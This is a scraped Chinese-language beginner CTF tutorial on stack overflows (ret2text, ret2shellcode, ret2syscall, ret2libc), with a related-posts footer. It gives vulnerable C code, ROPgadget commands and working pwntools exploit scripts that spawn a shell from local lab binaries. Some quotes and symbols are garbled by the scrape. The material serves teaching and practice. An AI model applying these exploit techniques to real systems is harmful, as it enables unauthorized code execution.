2. 程式人生 > >PWN菜雞入門之棧溢出(1)

PWN菜雞入門之棧溢出(1)

阿新 發佈:2019-02-03
使用 per pri binary 內容 _cdecl com bubuko 應該

棧溢出

一、基本概念:

  • 函數調用棧情況見鏈接

  • 基本準備:

    bss段可執行檢測:

?  
gef?  b main
Breakpoint 1 at 0x8048536: file ret2shellcode.c, line 8.
gef?  r
Starting program: /mnt/hgfs/Hack/CTF-Learn/pwn/stack/example/ret2shellcode/ret2shellcode 

gef?  vmmap

  • ROPgadget

    ROPgadget --binary rop  --only pop|ret
     
     | grep eax
ROPgadget --binary rop  --only pop|ret | grep ebx
ROPgadget --binary rop  --string /bin/sh
ROPgadget --binary rop  --only int

  • 系統調用

    Linux系統中通過軟中斷0x80調用實現控制權轉移給內核,內容執行完成後返回結果。所有系統調用在linux內核的源文件目錄"arch/x86/kernel"中的各種文件中定義,具體建本文最後一部分的列表。技術分享圖片

技術分享圖片

二、ret2text

ret2text其實就是調用程序中text中已經存在的shell

三、ret2shellcode

ret2shellcode,即控制程序執行 shellcode 代碼。shellcode 指的是用於完成某個功能的匯編代碼,常見的功能主要是獲取目標系統的 shell。一般來說,shellcode 需要我們自己填充。這其實是另外一種典型的利用方法,即此時我們需要自己去填充一些可執行的代碼

PAYLOAD形式:padding1 + address of shellcode + padding2 + shellcode

技術分享圖片

實例:

int __cdecl main(int argc, const char **argv, const char
 
 **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1
?
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets((char *)&v4);
  strncpy(buf2, (const char *)&v4, 0x64u);
  printf("bye bye ~");
  return 0;
}

shellcode

解析:先將shellcode寫進v4,再溢出v4到返回地址,然後將返回地址覆蓋成buf2

#!/usr/bin/env python
from pwn import *
?
sh = process(‘./ret2shellcode‘)
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080
?
sh.sendline(shellcode.ljust(112, ‘A‘) + p32(buf2_addr))
sh.interactive()
?

  

四、ret2syscall

ret2syscall,即控制程序執行系統調用,獲取 shell。

由於我們不能直接利用程序中的某一段代碼或者自己填寫代碼來獲得 shell,所以我們利用程序中的 gadgets 來獲得 shell,而對應的 shell 獲取則是利用系統調用。簡單地說,只要我們把對應獲取 shell 的系統調用的參數放到對應的寄存器中,那麽我們在執行 int 0x80 就可執行對應的系統調用。

32位:拿execve()來舉例

  • 系統調用號,即 eax 應該為 0xb

  • 第一個參數,即 ebx 應該指向 /bin/sh 的地址,其實執行 sh 的地址也可以。

  • 第二個參數,即 ecx 應該為 0

  • 第三個參數,即 edx 應該為 0

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("This time, no system() and NO SHELLCODE!!!");
  puts("What do you plan to do?");
  gets(&v4);
  return 0;
}

找到相應寄存器地址,其中0xb為execve系統調用地址

#!/usr/bin/env python
from pwn import *
?
sh = process(./rop)
?
pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat(
    [A * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
sh.sendline(payload)
sh.interactive()

五、ret2libc

ret2libc 即控制函數的執行 libc 中的函數,通常是返回至某個函數的 plt 處或者函數的具體位置 (即函數對應的 got 表項的內容)。一般情況下,我們會選擇執行 system("/bin/sh"),故而此時我們需要知道 system 函數的地址。

payload: padding1 + address of system() + padding2 + address of “/bin/sh”

技術分享圖片

padding1 處的數據可以隨意填充(註意不要包含 “\x00” ,否則向程序傳入溢出數據時會造成截斷),長度應該剛好覆蓋函數的基地址。

address of system() 是 system() 在內存中的地址,用來覆蓋返回地址。

padding2 處的數據長度為4(32位機),對應調用 system() 時的返回地址。因為我們在這裏只需要打開 shell 就可以,並不關心從 shell 退出之後的行為,所以 padding2 的內容可以隨意填充。

address of “/bin/sh” 是字符串 “/bin/sh” 在內存中的地址,作為傳給 system() 的參數。

實例:

1).ret2libc1

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1
?
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets((char *)&v4);
  return 0;
}
?


exp:
from pwn import *
?
sh = process(‘./ret2libc1‘)
?
binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat([‘a‘ * 112, system_plt, ‘b‘ * 4, binsh_addr])
sh.sendline(payload)
?
sh.interactive()

 2).ret2libc2

技術分享圖片

技術分享圖片

開啟了堆棧不可執行保護

1、構造 payload

第一部分:

‘a‘ * 112 + gets_plt + ret_addr + buf_addr

這裏需要思考兩點,第一點就是 buf 地址,我們的 “/bin/sh” 應該放在哪裏,通常我們會選擇 .bss (存儲未初始化全局變量) 段,IDA 查看 .bss 段發現程序給出了 buf2[100]數組,正好就可以使用這塊區域。

技術分享圖片現在考慮返回地址,因為在 gets() 函數完成後需要調用 system() 函數需要保持堆棧平衡,所以在調用完 gets() 函數後提升堆棧,這就需要 add esp, 4 這樣的指令但是程序中並沒有這樣的指令。更換思路,通過使用 pop xxx 指令也可以完成同樣的功能,在程序中找到了 pop ebx,ret 指令。

技術分享圖片

第二部分:

這部分就與上一題一樣,

system_plt + ret_addr + buf_addr

還有另外一種 payload 更簡潔情況:

在 gets() 函數調用完後,在返回地址處覆蓋上 system() 的地址將 gets() 函數的參數 buf 地址當成返回地址,再在後面加上 system() 函數的參數 buf。

’a‘ * 112 + gets_plt + system_plt + buf_addr + buf_addr
2、編寫 exp
from pwn import *
?
#context.log_level = debug
?
sh = process(./ret2libc2)
?
elf = ELF(ret2libc2)
?
def pwn(sh, payload):
    sh.recvuntil(?)
    sh.sendline(payload)
    sh.sendline(/bin/sh)#這裏將 /bin/sh 傳入 buf 中
    sh.interactive()
?
buf = elf.symbols[buf2]
gets_plt = elf.plt[gets]
system_plt = elf.plt[system]
pop_ebx_ret = 0x0804843d
ret_addr = 0xdeadbeef
?
#payload = a * 112 + p32(gets_plt) + p32(pop_ebx_ret) + p32(buf) + p32(system_plt) + p32(ret_addr) + p32(buf)
payload = a * 112 + p32(gets_plt) + p32(system_plt) + p32(buf) + p32(buf)
pwn(sh, payload)

PWN菜雞入門之棧溢出(1)

相關推薦

PWN入門1

使用 per pri binary 內容 _cdecl com bubuko 應該 棧溢出 一、基本概念: 函數調用棧情況見鏈接 基本準備: bss段可執行檢測: ?   gef? b main Breakpoint 1 at 0

PWN入門 2—— ret2libc與動態鏈接庫的關系

行數 break 思路 off 發現 x11 代碼段 之間 .net 準備知識引用自https://www.freebuf.com/articles/rookie/182894.html 0×01 利用思路 ret2libc 這種攻擊方式主要是針對 動

PWN入門函數調用的聯系

sof cccccc ebp main函數 程序 spa last lock 實例 一、函數調用棧過程總結 Fig 1. 函數調用發生和結束時調用棧的變化 Fig 2. 將被調用函數的參數壓入棧內 Fig 3. 將被調用函數的返回地址壓入棧內 Fig

PWN 入門 shellcode編寫 及exploid-db用法示例

fork 功能 mach .cn blog 網站 技術 lis main 一、shellcode編寫 下面我將參考其他資料來一步步示範shellcode的幾種編寫方式 0x01 系統調用 通過系統調用execve函數返回shell C語言實現: #include<

DotNet入門無限極分類設計篇

對數 tar null 擴展 creat nvarchar 鏈表 文章 數據庫設計 寫這個教程的原因,是因為,無限極分類,在許多項目中,都用得到。而對於新手來說,不是很好理解,同時,操作上也有一些誤區或者不當之處。所以我就鬥膽,拋磚引玉一下,已一個常見的後臺左側頻道樹為例子

20155306 白皎 0day漏洞——漏洞利用原理利用

put strong 3.2 base 十六進制 格式 correct 3.5 3.1 20155306 白皎 0day漏洞——漏洞利用原理之棧溢出利用 一、系統棧的工作原理 1.1內存的用途 根據不同的操作系統,一個進程可能被分配到不同的內存區域去執行。但是不管什麽樣的操

路由器漏洞挖掘 - 反彈shell的payload構造

sock http all ram cda shu n) dwr get 前言 前一篇講到了 ROP 鏈的構造,最後直接使用調用 execve 函數的 shellcode 就可以直接 getshell,但是實際路由器溢出的情況下都不會那麽簡單。 這裏再看一道 DVRF 的題

筆記1.9 認識SEH

關閉 ont tps 字符 查看 lis vs2008 windows -a 從本節開始,我們就要研究一些略微高級點的話題了,如同在1.2節中看到的,Windows中為抵抗棧溢出做了非常多保護性的檢查工作,編譯的程序默認開啟了這些保護。假設我們不能繞過這

C語言中 有符號數、無符號數、整數

alt 原因 () tar sig 重新 detail copyto 想象 [cpp] view plain copy print? #include<stdio.h> void main() { int l=-1; unsigned

Spring Boot 入門持久層篇

imp 配置文件 bat catch map ann 文件 save values 原文地址:Spring Boot 入門之持久層篇(三) 博客地址:http://www.extlight.com 一、前言 上一篇《Spring Boot 入門之 Web 篇(二)》介紹

有效防止softmax計算時上overflow和下underflow的方法

play over 這樣的 第四章 AC alt ref 溢出 數值計算 《Deep Learning》(Ian Goodfellow & Yoshua Bengio & Aaron Courville)第四章「數值計算」中,談到了上溢出(overflo

springmvc入門映射處理器

als tst pass 登錄 其它 value false 是把 中間 實例:SimpleUrlHandlerMapping 步驟一:建立後端控制器UserContrller.java.代碼如下: package com.asm; //...省略導入的相關類

《用Python玩轉資料》專案—線性迴歸分析入門波士頓房價預測

接上一部分,此篇將用tensorflow建立神經網路,對波士頓房價資料進行簡單建模預測。 二、使用tensorflow擬合boston房價datasets 1、資料處理依然利用sklearn來分訓練集和測試集。 2、使用一層隱藏層的簡單網路,試下來用當前這組超引數收斂較快,準確率也可以。 3、啟用函式

《用Python玩轉數據》項目—線性回歸分析入門波士頓房價預測

store mil ima 超參數 eval app lac on() break 接上一部分,此篇將用tensorflow建立神經網絡,對波士頓房價數據進行簡單建模預測。 二、使用tensorflow擬合boston房價datasets 1、數據處理依然利用sklearn

C語言變量定義與數據初學者

function res color RoCE abc 說明符 形式 string bold 1、變量定義的一般形式為:類型說明符、變量名標識符等;例:int a,b,c;(abc為整型變量) 在書寫變量定義時應註意以下幾點: (1)允許在一個類型說明符後,定義多個相同類型

Spring Boot 入門web基礎篇

一、前言上一篇《Spring Boot 入門之基礎篇(一)》介紹了 Spring Boot 的環境搭建以及專案啟動打包等基礎內容,本篇繼續深入介紹 Spring Boot 與 Web 開發相關的知識。二、整合模板引擎由於 jsp 不被 SpringBoot 推薦使用,所以模板

鳥學習nginx事件模組epoll1

上一篇介紹核心事件模組,本篇介紹事件模組ngx_epoll_module。Nginx在linux環境下采用epoll網路模型,對於epoll網路型不瞭解的可自行百度查詢,本篇不在闡述。 一、問題 本篇要澄清以下幾個問題: 1、當客戶端發起TCP連線後,事件模組是如何管理新連線?

資料結構模板實現3

注意:1 注意模板的格式,宣告檔案和實現檔案都放在標頭檔案中,無法實現分離編譯; 2 學會過載運算子和友元函式使用 #ifndef MYSTACK_H #define MYS

作業系統頁面置換演算法先進先FIFO演算法

import java.util.LinkedList; import java.util.List; public class FIFO {public static void main(String[] args) {int framesize = 5;   //幀數量int[] s = { 1, 2,

Qt QuickStackView具體解釋1

left 記錄 內部 變化 原創 focus filo 郵箱 sta Qt Quick中有個StackView。我在《Qt Quick核心編程》一書中沒有講到。近期有人問起,趁機學習了一下,把它的基本使用方法記錄下來。 我準備分兩次來講。第一次講主要的